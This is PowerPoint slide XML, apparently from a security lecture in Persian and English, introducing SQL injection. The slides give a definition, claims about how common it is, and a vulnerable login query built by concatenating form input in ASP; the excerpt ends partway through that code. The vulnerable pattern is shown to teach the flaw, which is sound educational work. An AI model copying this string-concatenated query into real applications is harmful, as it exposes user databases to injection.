              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Gives a result set like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>LastName</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>--------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Smith</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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28</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>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219200" y="152400"/>
            <a:ext cx="6096000"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0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>What is SQL Injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="838200"/>
            <a:ext cx="4953000" cy="4343400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>The ability to inject SQL commands into the database engine</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>through an existing application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="1600200"/>
            <a:ext cx="3048000" cy="2579077"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="figure 1-2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4800600"/>
            <a:ext cx="6248400" cy="1287463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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29</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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6477000" cy="685800"/>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fa-IR" smtClean="0"/>
              <a:t>فهرست مطالب</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>سرريز بافر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Buffer Overflow)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>تزريق </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(SQL Injection)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>شنود </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(Sniffing)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>جعل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(Spoofing)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>پيوست 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>پيوست 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="6508750"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF609A56-AC5A-4F35-9CD4-7517B1924DD8}" type="slidenum">
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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219200" y="152400"/>
            <a:ext cx="6705600"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0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>How common is it?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="8305800" cy="4830763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>It is probably the most common Website vulnerability today!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>It is a flaw in "web application" development, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>it is not a DB or web server problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Most programmers are still not aware of this problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>A lot of the tutorials &amp; demo “templates” are vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Even worse, a lot of solutions posted on the Internet are not good enough</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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30</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-IR"/>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43000" y="152400"/>
            <a:ext cx="6781800"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0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>How does SQL Injection work?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="8458200" cy="5029200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Common vulnerable login query </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SELECT * FROM users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>WHERE login = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>AND password = '123'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>If it returns something then login!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ASP/MS SQL Server login syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="auto">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>"SELECT * FROM users WHERE login = '" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>formusr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> + "' AND password = '" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
